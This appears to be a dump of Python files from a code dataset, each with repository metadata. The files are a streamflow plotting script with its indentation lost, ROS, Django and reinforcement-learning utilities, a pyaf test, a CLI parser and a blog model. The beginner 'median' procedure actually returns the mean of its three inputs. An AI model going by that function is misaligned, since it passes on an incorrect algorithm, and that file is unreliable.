path2 = "/skynet3_rech1/huziy/hdf_store/quebec_0.1_crcm5-hcd-rl.hdf5"
label2 = "CRCM5-L2"
color2, color1 = bmap.mpl_colors[:2]
fldirs = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_FLOW_DIRECTIONS_NAME)
lons2d, lats2d, basemap = analysis.get_basemap_from_hdf(path1)
lake_fractions = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_LAKE_FRACTION_NAME)
# cell_areas = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_CELL_AREA_NAME)
acc_area = analysis.get_array_from_file(path=path1, var_name=infovar.HDF_ACCUMULATION_AREA_NAME)
cell_manager = CellManager(fldirs, lons2d=lons2d, lats2d=lats2d, accumulation_area_km2=acc_area)
station_to_mp = cell_manager.get_model_points_for_stations(station_list=stations,
lake_fraction=lake_fractions,
drainaige_area_reldiff_limit=0.3)
fig, axes = plt.subplots(1, 2, gridspec_kw=dict(top=0.80, wspace=0.4))
q90_obs_list = []
q90_mod1_list = []
q90_mod2_list = []
q10_obs_list = []
q10_mod1_list = []
q10_mod2_list = []
for the_station, the_mp in station_to_mp.items():
assert isinstance(the_station, Station)
compl_years = the_station.get_list_of_complete_years()
if len(compl_years) < 3:
continue
t, stfl1 = analysis.get_daily_climatology_for_a_point(path=path1, years_of_interest=compl_years,
i_index=the_mp.ix, j_index=the_mp.jy, var_name="STFA")
_, stfl2 = analysis.get_daily_climatology_for_a_point(path=path2, years_of_interest=compl_years,
i_index=the_mp.ix, j_index=the_mp.jy, var_name="STFA")
_, stfl_obs = the_station.get_daily_climatology_for_complete_years(stamp_dates=t, years=compl_years)
# Q90
q90_obs = np.percentile(stfl_obs, 90)
q90_mod1 = np.percentile(stfl1, 90)
q90_mod2 = np.percentile(stfl2, 90)
# Q10
q10_obs = np.percentile(stfl_obs, 10)
q10_mod1 = np.percentile(stfl1, 10)
q10_mod2 = np.percentile(stfl2, 10)
# save quantiles to lists for correlation calculation
q90_obs_list.append(q90_obs)
q90_mod1_list.append(q90_mod1)
q90_mod2_list.append(q90_mod2)
q10_mod1_list.append(q10_mod1)
q10_mod2_list.append(q10_mod2)
q10_obs_list.append(q10_obs)
# axes[0].annotate(the_station.id, (q90_obs, np.percentile(stfl1, 90)))
# axes[1].annotate(the_station.id, (q10_obs, np.percentile(stfl1, 10)))
# Plot scatter plot of Q90
the_ax = axes[0]
# the_ax.annotate(the_station.id, (q90_obs, np.percentile(stfl1, 90)))
the_ax.scatter(q90_obs_list, q90_mod1_list, label=label1, c=color1)
the_ax.scatter(q90_obs_list, q90_mod2_list, label=label2, c=color2)
# plot scatter plot of Q10
the_ax = axes[1]
# the_ax.annotate(the_station.id, (q10_obs, np.percentile(stfl1, 10)))
h1 = the_ax.scatter(q10_obs_list, q10_mod1_list, label=label1, c=color1)
h2 = the_ax.scatter(q10_obs_list, q10_mod2_list, label=label2, c=color2)
# Add correlation coefficients to the axes
fp = FontProperties(size=14, weight="bold")
axes[0].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q90_mod1_list, q90_obs_list)[0, 1] ** 2),
(0.1, 0.85), color=color1, xycoords="axes fraction", font_properties=fp)
axes[0].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q90_mod2_list, q90_obs_list)[0, 1] ** 2),
(0.1, 0.70), color=color2, xycoords="axes fraction", font_properties=fp)
axes[1].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q10_mod1_list, q10_obs_list)[0, 1] ** 2),
(0.1, 0.85), color=color1, xycoords="axes fraction", font_properties=fp)
axes[1].annotate(r"$R^2 = {0:.2f}$".format(np.corrcoef(q10_mod2_list, q10_obs_list)[0, 1] ** 2),
(0.1, 0.70), color=color2, xycoords="axes fraction", font_properties=fp)
sf = ScalarFormatter(useMathText=True)
sf.set_powerlimits((-2, 3))
for ind, the_ax in enumerate(axes):
plot_one_to_one_line(the_ax)
if ind == 0:
the_ax.set_xlabel(r"Observed $\left({\rm m^3/s} \right)$")
the_ax.set_ylabel(r"Modelled $\left({\rm m^3/s} \right)$")
the_ax.annotate(r"$Q_{90}$" if ind == 0 else r"$Q_{10}$",
(0.95, 0.95), xycoords="axes fraction",
bbox=dict(facecolor="white"),
va="top", ha="right")
the_ax.xaxis.set_major_formatter(sf)
the_ax.yaxis.set_major_formatter(sf)
locator = MaxNLocator(nbins=5)
the_ax.xaxis.set_major_locator(locator)
the_ax.yaxis.set_major_locator(locator)
x1, x2 = the_ax.get_xlim()
# Since streamflow percentiles can only be positive
the_ax.set_xlim(0, x2)
the_ax.set_ylim(0, x2)
fig.legend([h1, h2], [label1, label2], loc="upper center", ncol=2)
figpath = os.path.join(images_folder, "percentiles_comparison.png")
# plt.tight_layout()
fig.savefig(figpath, dpi=cpp.FIG_SAVE_DPI, bbox_inches="tight")
if __name__ == "__main__":
import application_properties
application_properties.set_current_directory()
    main()
| [
"[email protected]"
]
| |
b8a196d6aa3611a6fbcce7ad132fcd437d7f6bf3 | b1b86d8528df27d99ed56ed16f1ba15b5ae78661 | /build_isolated/waterplus_map_tools/cmake/waterplus_map_tools-genmsg-context.py | 13af763d2d6d2c9932b8be57f4bfc5f85289af4d | []
| no_license | gychen-n/match | 8754ac128b43f81e00faf3ab2af160af70a1d4a3 | ec91f19d104aa4a827c9f66d362f94fe44739cad | refs/heads/main | 2023-04-09T19:56:55.507118 | 2021-04-15T13:39:02 | 2021-04-15T13:39:02 | 358,268,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/gyc/match_ws/src/tools/waterplus_map_tools/msg/Waypoint.msg"
services_str = "/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/SaveWaypoints.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/AddNewWaypoint.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/GetNumOfWaypoints.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/GetWaypointByIndex.srv;/home/gyc/match_ws/src/tools/waterplus_map_tools/srv/GetWaypointByName.srv"
pkg_name = "waterplus_map_tools"
dependencies_str = "std_msgs;geometry_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "waterplus_map_tools;/home/gyc/match_ws/src/tools/waterplus_map_tools/msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| [
"[email protected]"
]
| |
ab104e594bbf8454e09b791cefc01091331f1e51 | a90077635aeac846965381e0b07591a1df011afe | /care/facility/summarisation/facility_capacity.py | 17669b7b24a61209378ee70cec2dbb3a812a2584 | [
"MIT"
]
| permissive | Basharckr/care | f873ca140ae8607846d9b9500e3c21e9bfa15800 | c86ae2614ea9ba80b140a2eb21ad64fdbb47ad7e | refs/heads/master | 2023-06-17T21:26:48.936321 | 2021-07-12T06:03:52 | 2021-07-12T06:03:52 | 386,884,450 | 1 | 0 | MIT | 2021-07-17T08:41:09 | 2021-07-17T08:41:09 | null | UTF-8 | Python | false | false | 8,112 | py | from celery.decorators import periodic_task
from celery.schedules import crontab
from django.db.models import Sum
from django.utils.decorators import method_decorator
from django.utils.timezone import localtime, now
from django.views.decorators.cache import cache_page
from django_filters import rest_framework as filters
from rest_framework import serializers
from rest_framework.mixins import ListModelMixin
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.viewsets import GenericViewSet
from care.facility.api.serializers.facility import FacilitySerializer
from care.facility.api.serializers.facility_capacity import FacilityCapacitySerializer
from care.facility.models import Facility, FacilityCapacity, FacilityRelatedSummary, PatientRegistration
from care.facility.models.inventory import FacilityInventoryBurnRate, FacilityInventoryLog, FacilityInventorySummary
from care.facility.models.patient import PatientRegistration
class FacilitySummarySerializer(serializers.ModelSerializer):
facility = FacilitySerializer()
class Meta:
model = FacilityRelatedSummary
exclude = (
"id",
"s_type",
)
class FacilitySummaryFilter(filters.FilterSet):
start_date = filters.DateFilter(field_name="created_date", lookup_expr="gte")
end_date = filters.DateFilter(field_name="created_date", lookup_expr="lte")
facility = filters.UUIDFilter(field_name="facility__external_id")
district = filters.NumberFilter(field_name="facility__district__id")
local_body = filters.NumberFilter(field_name="facility__local_body__id")
state = filters.NumberFilter(field_name="facility__state__id")
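# Illustrative sketch: applying the filter above outside of a request cycle
# (e.g. from a shell). The filter values shown are arbitrary examples.
def _example_filtered_summaries():
    queryset = FacilityRelatedSummary.objects.filter(s_type="FacilityCapacity")
    filterset = FacilitySummaryFilter(
        data={"start_date": "2020-05-01", "end_date": "2020-05-31", "district": "1"},
        queryset=queryset,
    )
    return filterset.qs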
class FacilityCapacitySummaryViewSet(
ListModelMixin, GenericViewSet,
):
lookup_field = "external_id"
queryset = (
FacilityRelatedSummary.objects.filter(s_type="FacilityCapacity")
.order_by("-created_date")
.select_related("facility", "facility__state", "facility__district", "facility__local_body")
)
permission_classes = (IsAuthenticatedOrReadOnly,)
serializer_class = FacilitySummarySerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = FacilitySummaryFilter
@method_decorator(cache_page(60 * 10))
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
# def get_queryset(self):
# user = self.request.user
# queryset = self.queryset
# if user.is_superuser:
# return queryset
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["DistrictReadOnlyAdmin"]:
# return queryset.filter(facility__district=user.district)
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["StateReadOnlyAdmin"]:
# return queryset.filter(facility__state=user.state)
# return queryset.filter(facility__users__id__exact=user.id)
def FacilityCapacitySummary():
capacity_objects = FacilityCapacity.objects.all().select_related(
"facility", "facility__state", "facility__district", "facility__local_body"
)
capacity_summary = {}
current_date = localtime(now()).replace(hour=0, minute=0, second=0, microsecond=0)
for facility_obj in Facility.objects.all():
# Calculate Actual Patients Discharged and Live in this Facility
patients_in_facility = PatientRegistration.objects.filter(facility_id=facility_obj.id).select_related(
"state", "district", "local_body"
)
capacity_summary[facility_obj.id] = FacilitySerializer(facility_obj).data
capacity_summary[facility_obj.id]["actual_live_patients"] = patients_in_facility.filter(is_active=True).count()
discharge_patients = patients_in_facility.filter(is_active=False)
capacity_summary[facility_obj.id]["actual_discharged_patients"] = discharge_patients.count()
capacity_summary[facility_obj.id]["availability"] = []
temp_inventory_summary_obj = {}
summary_objs = FacilityInventorySummary.objects.filter(facility_id=facility_obj.id)
for summary_obj in summary_objs:
burn_rate = FacilityInventoryBurnRate.objects.filter(
facility_id=facility_obj.id, item_id=summary_obj.item.id
).first()
log_query = FacilityInventoryLog.objects.filter(
facility_id=facility_obj.id,
item_id=summary_obj.item.id,
created_date__gte=current_date,
probable_accident=False,
)
# start_log = log_query.order_by("created_date").first()
end_log = log_query.order_by("-created_date").first()
# start_stock = summary_obj.quantity_in_default_unit
# if start_log:
# if start_log.is_incoming: # Add current value to current stock to get correct stock
# start_stock = start_log.current_stock + start_log.quantity_in_default_unit
# else:
# start_stock = start_log.current_stock - start_log.quantity_in_default_unit
end_stock = summary_obj.quantity
if end_log:
end_stock = end_log.current_stock
total_consumed = 0
temp1 = log_query.filter(is_incoming=False).aggregate(Sum("quantity_in_default_unit"))
if temp1:
total_consumed = temp1.get("quantity_in_default_unit__sum", 0)
if not total_consumed:
total_consumed = 0
total_added = 0
temp2 = log_query.filter(is_incoming=True).aggregate(Sum("quantity_in_default_unit"))
if temp2:
total_added = temp2.get("quantity_in_default_unit__sum", 0)
if not total_added:
total_added = 0
# Calculate Start Stock as
# end_stock = start_stock - consumption + addition
# start_stock = end_stock - addition + consumption
# This way the start stock will never veer off course
start_stock = end_stock - total_added + total_consumed
if burn_rate:
burn_rate = burn_rate.burn_rate
temp_inventory_summary_obj[summary_obj.item.id] = {
"item_name": summary_obj.item.name,
"stock": summary_obj.quantity,
"unit": summary_obj.item.default_unit.name,
"is_low": summary_obj.is_low,
"burn_rate": burn_rate,
"start_stock": start_stock,
"end_stock": end_stock,
"total_consumed": total_consumed,
"total_added": total_added,
"modified_date": summary_obj.modified_date.astimezone().isoformat(),
}
capacity_summary[facility_obj.id]["inventory"] = temp_inventory_summary_obj
for capacity_object in capacity_objects:
facility_id = capacity_object.facility.id
if facility_id not in capacity_summary:
capacity_summary[facility_id] = FacilitySerializer(capacity_object.facility).data
if "availability" not in capacity_summary[facility_id]:
capacity_summary[facility_id]["availability"] = []
capacity_summary[facility_id]["availability"].append(FacilityCapacitySerializer(capacity_object).data)
for i in capacity_summary:
facility_summary_obj = None
if FacilityRelatedSummary.objects.filter(
s_type="FacilityCapacity", facility_id=i, created_date__gte=current_date
).exists():
facility_summary_obj = FacilityRelatedSummary.objects.get(
s_type="FacilityCapacity", facility_id=i, created_date__gte=current_date
)
else:
facility_summary_obj = FacilityRelatedSummary(s_type="FacilityCapacity", facility_id=i)
facility_summary_obj.data = capacity_summary[i]
facility_summary_obj.save()
return True
@periodic_task(run_every=crontab(minute="*/5"))
def run_midnight():
FacilityCapacitySummary()
print("Summarised Capacities")
| [
"[email protected]"
]
| |
d3d10a4755e4599dfc81f7fea2fea1d344dc0b4b | 82bdb812582e7ad42db922023f3eb84b4fb80f72 | /networks.py | 4a8973311254d1c7786d7381d47672b7ffe20ffd | []
| no_license | hzaskywalker/AWR-Python | cda43594248f3db563456f67c677db4508f80a5c | 4fb00f3691b980c93734b11fab6002737a369b31 | refs/heads/master | 2022-10-11T09:31:37.742771 | 2020-06-11T17:18:10 | 2020-06-11T17:18:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,135 | py | import torch
import numpy as np
class Value:
def __init__(self, policy):
self.policy = policy
def __call__(self, state, params):
state = torch.cat((state, params), dim=-1)
act = self.policy.actor_target(state)
cri1, cri2 = self.policy.critic_target(state,act)
return torch.min(cri1, cri2)
#return min(min (cri1.numpy(), cri2.numpy())[0][0])
def get_td3_value(env_name):
if env_name == "DartWalker2dPT-v1":
state_dim = 25
action_dim = 6
max_action = 1.0
elif env_name == "DartHopperPT-v1":
state_dim = 16
action_dim = 3
max_action = 1.0
import utils
import policy_transfer.uposi.TD3.utils
from policy_transfer.uposi.TD3.TD3 import TD3
import policy_transfer.uposi.TD3.OurDDPG
import policy_transfer.uposi.TD3.DDPG
policy = TD3(state_dim = state_dim, action_dim = action_dim, max_action = max_action)
policy.load("/home/hza/policy_transfer/PT/policy_transfer/uposi/TD3/models/TD3_" + env_name + "_1000")
#policy.actor_target.to(torch.device("cpu"))
#policy.critic_target.to(torch.device("cpu"))
policy.actor_target.to(torch.device("cuda"))
policy.critic_target.to(torch.device("cuda"))
return Value(policy)
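# Minimal usage sketch for the wrapper above. The 11/5 split between observation
# and latent-parameter dimensions is an assumption; only their sum
# (state_dim = 16 for DartHopperPT-v1) is fixed by the code above.
def _example_td3_value():
    value_fn = get_td3_value("DartHopperPT-v1")
    state = torch.zeros(1, 11, device="cuda")
    params = torch.zeros(1, 5, device="cuda")
    return value_fn(state, params)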
class UP:
def __init__(self, actor_critic, ob_rms):
self.actor_critic = actor_critic
self.ob_rms = ob_rms
self.device = 'cuda:0'
self.params = None
def reset(self):
self.hidden = torch.zeros(
1, self.actor_critic.recurrent_hidden_state_size, device=self.device)
self.mask = torch.zeros(1, 1, device=self.device)
def set_params(self, params):
self.params = params
def __call__(self, ob):
assert self.params is not None
ob = np.concatenate((ob, self.params))
ob = torch.tensor([np.clip((ob - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + 1e-08), -10.0, 10.0)], dtype=torch.float32, device=self.device)
_, action, _, self.hidden_state = self.actor_critic.act(ob, self.hidden, self.mask, deterministic=True)
return action.detach().cpu().numpy()[0]
def get_up_network(env_name, num):
import sys
import os
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'PT/policy_transfer/uposi'))
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'PT/baselines'))
from a2c_ppo_acktr import algo, utils
from a2c_ppo_acktr.algo import gail
from a2c_ppo_acktr.arguments import get_args
from a2c_ppo_acktr.envs import make_vec_envs
from a2c_ppo_acktr.model import Policy
from a2c_ppo_acktr.storage import RolloutStorage
env_name = env_name[:-5]
if 'Dart' in env_name:
path = f"/home/hza/policy_transfer/PT/trained_models/ppo/UP_{env_name}_{num}.pt"
else:
path = f"/home/hza/policy_transfer/PT/trained_models/ppo/UP_{env_name}_{num}.pt"
result = torch.load(path, map_location=lambda a, b:torch.Storage().cuda())
actor_critic = result[0]
actor_critic.cuda()
ob_rms = result[1]
return UP(actor_critic, ob_rms)
class UP2(UP):
def __init__(self, agent):
self.agent = agent
self.params = None
def set_params(self, params):
self.params = params
def __call__(self, ob):
if len(self.params.shape) == 1:
ob = np.concatenate((ob, self.params), axis=0)[None,:]
else:
ob = np.concatenate((np.tile(ob,(len(self.params), 1)), self.params), axis=1)
action = self.agent.act(ob, mode='test')
return action.mean(axis=0)
def reset(self):
pass
def get_awr_network(env_name, num):
import torch
import sys
sys.path.append('awr2')
path = f'awr2/models/{env_name}'
agent = torch.load(path)
return UP2(agent)
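# Minimal usage sketch for the AWR wrapper above. The observation size (11) and
# the two-element parameter vector are illustrative assumptions.
def _example_awr_policy():
    policy = get_awr_network("DartHopperPT-v1", 5)
    policy.set_params(np.array([0.5, 1.0]))
    return policy(np.zeros(11))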
def get_finetune_network(env_name, num, num_iter=21, num_proc=10):
import torch
import sys
from finetune import Finetune
sys.path.append('awr2')
path = f'awr2/models/{env_name}'
agent = torch.load(path)
    return Finetune(env_name, num, agent, num_iter, num_proc=num_proc)
| [
"[email protected]"
]
| |
d97fa27fd1ef8dab53b15a077aea13385d7f7afd | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_Quantization/trend_MovingMedian/cycle_12/ar_/test_artificial_128_Quantization_MovingMedian_12__100.py | 64695ec2235c61ebbe172764ee17c38a3ffdbfd8 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 272 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "MovingMedian", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 100, ar_order = 0);
| [
"[email protected]"
]
| |
b87981a578e9f0a4fa7bd52c97f63d833cf5ea5c | 3d7e1a506d65c23c84b7430fa46623cb98de8c64 | /median.py | dc0584831963d0d6f87700eddb7c8140d94fb9f2 | []
| no_license | crakama/UdacityIntrotoComputerScience | cb6ac8a9084f078eaf245a52adc43541c35dc3f4 | 416b82b85ff70c48eabae6bb9d7b43354a158d9a | refs/heads/master | 2021-01-09T20:39:15.974791 | 2016-07-18T20:59:09 | 2016-07-18T20:59:09 | 60,571,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | # Define a procedure, median, that takes three
# numbers as its inputs, and returns the median
# of the three numbers.
# Make sure your procedure has a return statement.
def bigger(a,b):
if a > b:
return a
else:
return b
def biggest(a,b,c):
return bigger(a,bigger(b,c))
def median(a, b, c):
summation = a + b + c
median = summation / 3
return median
| [
"[email protected]"
]
| |
1ee30cd5b57a8912f7804703d5709be5b9d229d5 | 77ca708f981b3d4127568ff416e3c0a3dc1fff94 | /util/cli_parser.py | be02dbf7e3bb509d0d10d208c7954fafe85a7c4c | [
"Apache-2.0"
]
| permissive | inksong/bidDB_downloader | df7046cadc392872d4ed58bd730474771e83aaf0 | 1550b6006d1d21bab726bbe5a10c8c2d7aa94bbc | refs/heads/master | 2022-03-06T19:10:03.333813 | 2019-09-28T19:41:15 | 2019-09-28T19:41:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,575 | py | import argparse
import sys
class CLIParser:
# -- Public methods
# CLIParser Constructor
def __init__(self):
super(CLIParser, self).__init__()
self.parser = argparse.ArgumentParser(prog='bidDB_downloader.py', description='BugTraq database downloader.')
self.parser.add_argument('-w','--workers', type=int, default=100, help='number of workers for execution. By '
'default, the workers number is set '
'to 100')
self.parser.add_argument('-f', '--first', type=int, default=1, help='your download will start from this '
'BugTraq Id. By default, the first BugTraq '
'Id is set to 1')
self.parser.add_argument('-l', '--last', type=int, default=100000, help='your download will finish in this last'
' BugTraq Id. By default, the last '
'BugTraq Id is set to 100000')
self.parser.add_argument('-v', '--version', action='version', version='%(prog)s 0.1.0',
help='show the version message and exit')
self.args = self.parser.parse_args()
self.__verify_args()
# -- Getters
# Gets workers
def get_workers(self):
return self.args.workers
# Gets the first bid
def get_first_bid(self):
return self.args.first
# Gets the last bid
def get_last_bid(self):
return self.args.last
# -- Private methods
# Verify command line arguments
def __verify_args(self):
if self.args.first <= 0 or self.args.last <= 0 or self.args.workers <= 0:
print(self.parser.prog + ': error: all arguments must be greater than zero.', file=sys.stderr)
exit(2)
elif self.args.first > self.args.last:
print(self.parser.prog + ': error: argument -l/--last: this argument must be greater than -f/--first '
'argument.', file=sys.stderr)
exit(2)
elif self.args.workers > 500:
print(self.parser.prog + ': warning: argument -w/--workers: your system may be unstable with values '
'greater than 500.', file=sys.stderr)
| [
"[email protected]"
]
| |
bd1e701a5e902eca16077631d3424e1691ebb4f5 | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project2/Project2/.history/blog/models_20211115152413.py | 443d1fa03512e592b13bcd760279c43dbb1f7c43 | []
| no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 778 | py | from django.db import models
from django.contrib.auth.models import User
from ckeditor.fields import RichTextField
# Create your models here.
STATUS = ((0, "Draft"), (1, "Published"))
USE_TZ = False
class Blog(models.Model):
title = models.CharField('Tiêu đề', max_length=250, blank=True)
slug = models.SlugField(max_length=250, blank=True)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name='blog_posts')
created_on = models.DateTimeField('Giờ tạo',
auto_now_add=True)
update_on = models.DateTimeField('Giờ cập nhật', auto_now=True)
content = models.TextField()
status = models.IntegerField('Trạng thái', choices=STATUS, default=0)
    class Meta:
ordering = ['-created_on']
def __str__(self):
return self.title
| [
"[email protected]"
]
|